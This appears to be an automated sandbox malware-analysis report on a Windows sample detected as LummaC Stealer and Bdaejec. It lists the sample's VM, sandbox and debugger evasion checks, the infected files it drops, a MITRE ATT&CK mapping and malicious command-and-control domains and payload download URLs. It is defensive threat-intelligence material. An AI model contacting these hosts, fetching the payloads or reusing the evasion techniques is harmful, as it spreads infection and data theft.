Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-936

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe TID: 7712

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00DF1754h

2_2_00DF1718

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00DF29E2

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00DF2B8C

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

API call chain: ExitProcess graph end node

graph_2-911

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: strainriskpropos.stor
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: telephoneverdictyow.site
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: punchtelephoneverdi.stor
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: smallrabbitcrossing.site
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: snuggleapplicationswo.fun
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: theoryapparatusjuko.fun
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: healthproline.pro

Source: SciTE.exe.2.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

2_2_00DF1718

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_00DF139F

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: oHOvZLBf.exe PID: 7520, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: oHOvZLBf.exe PID: 7520, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	2 Process Injection	33 Virtualization/Sandbox Evasion	LSASS Memory	631 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	33 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	112 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	4 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	13 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Lisect_AVT_24003_G1A_70.exe	86%	Virustotal		Browse
Lisect_AVT_24003_G1A_70.exe	100%	Avira	W32/Jadtre.B
Lisect_AVT_24003_G1A_70.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	92%	ReversingLabs	Win32.Trojan.Madeba

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ddos.dnsnb8.net	13%	Virustotal	Browse
strainriskpropos.store	21%	Virustotal	Browse
snuggleapplicationswo.fun	21%	Virustotal	Browse
telephoneverdictyow.site	21%	Virustotal	Browse
punchtelephoneverdi.store	20%	Virustotal	Browse
smallrabbitcrossing.site	21%	Virustotal	Browse
healthproline.pro	11%	Virustotal	Browse
theoryapparatusjuko.fun	20%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	URL Reputation	malware
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
punchtelephoneverdi.stor	0%	Avira URL Cloud	safe
https://snuggleapplicationswo.fun/y	100%	Avira URL Cloud	malware
healthproline.pro	100%	Avira URL Cloud	malware
https://strainriskpropos.store/api	100%	Avira URL Cloud	malware
https://telephoneverdictyow.site/	100%	Avira URL Cloud	malware
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
healthproline.pro	11%	Virustotal		Browse
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
telephoneverdictyow.site	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	URL Reputation	safe
https://strainriskpropos.store:443/api7	100%	Avira URL Cloud	malware
http://www.baanboard.com	0%	URL Reputation	safe
https://strainriskpropos.store/api	18%	Virustotal		Browse
http://www.develop.comDeepak	0%	URL Reputation	safe
https://strainriskpropos.store/apii9	100%	Avira URL Cloud	malware
https://telephoneverdictyow.site/7	100%	Avira URL Cloud	malware
https://telephoneverdictyow.site/8	100%	Avira URL Cloud	malware
https://strainriskpropos.store:443/api7	8%	Virustotal		Browse
https://theoryapparatusjuko.fun/	100%	Avira URL Cloud	malware
https://telephoneverdictyow.site/	19%	Virustotal		Browse
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
smallrabbitcrossing.site	100%	Avira URL Cloud	malware
https://telephoneverdictyow.site/7	4%	Virustotal		Browse
smallrabbitcrossing.site	21%	Virustotal		Browse
telephoneverdictyow.site	21%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rarTq	100%	Avira URL Cloud	malware
https://theoryapparatusjuko.fun/	20%	Virustotal		Browse
https://theoryapparatusjuko.fun/api	18%	Virustotal		Browse
https://theoryapparatusjuko.fun/api	100%	Avira URL Cloud	malware
strainriskpropos.stor	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarO	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarDC:	100%	Avira URL Cloud	malware
https://telephoneverdictyow.site/8	4%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k2.rarl	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarDC:	9%	Virustotal		Browse
https://punchtelephoneverdi.store/	100%	Avira URL Cloud	malware
https://strainriskpropos.store/	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.raroC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarl	11%	Virustotal		Browse
https://strainriskpropos.store/apiG	100%	Avira URL Cloud	malware
theoryapparatusjuko.fun	100%	Avira URL Cloud	malware
https://strainriskpropos.store/apiG	17%	Virustotal		Browse
https://smallrabbitcrossing.site/	100%	Avira URL Cloud	malware
snuggleapplicationswo.fun	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarO	13%	Virustotal		Browse
theoryapparatusjuko.fun	20%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k3.rar4	100%	Avira URL Cloud	phishing
https://smallrabbitcrossing.site/	22%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rarc	100%	Avira URL Cloud	phishing
https://strainriskpropos.store/	21%	Virustotal		Browse
https://smallrabbitcrossing.site/M	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.raroC:	14%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k3.rar4	14%	Virustotal		Browse
https://punchtelephoneverdi.store/	20%	Virustotal		Browse
snuggleapplicationswo.fun	21%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rarc	12%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false	13%, Virustotal, Browse	unknown
healthproline.pro	unknown	unknown	true	11%, Virustotal, Browse	unknown
smallrabbitcrossing.site	unknown	unknown	true	21%, Virustotal, Browse	unknown
strainriskpropos.store	unknown	unknown	true	21%, Virustotal, Browse	unknown
snuggleapplicationswo.fun	unknown	unknown	true	21%, Virustotal, Browse	unknown
punchtelephoneverdi.store	unknown	unknown	true	20%, Virustotal, Browse	unknown
telephoneverdictyow.site	unknown	unknown	true	21%, Virustotal, Browse	unknown
theoryapparatusjuko.fun	unknown	unknown	true	20%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
punchtelephoneverdi.stor	true	Avira URL Cloud: safe	unknown
healthproline.pro	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
telephoneverdictyow.site	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar	true	URL Reputation: malware	unknown
smallrabbitcrossing.site	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
strainriskpropos.stor	true	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
theoryapparatusjuko.fun	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
snuggleapplicationswo.fun	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://telephoneverdictyow.site/	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://snuggleapplicationswo.fun/y	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://strainriskpropos.store/api	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://strainriskpropos.store:443/api7	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EEB000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EF1000.00000004.00000020.00020000.00000000.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.activestate.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://strainriskpropos.store/apii9	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://telephoneverdictyow.site/7	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://telephoneverdictyow.site/8	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://theoryapparatusjuko.fun/	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	oHOvZLBf.exe, 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmp, oHOvZLBf.exe, 00000002.00000003.1289900252.00000000007F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarTq	oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://theoryapparatusjuko.fun/api	Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarO	oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.2.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.baanboard.comBrendon	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarDC:	oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarl	oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.scintilla.org	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
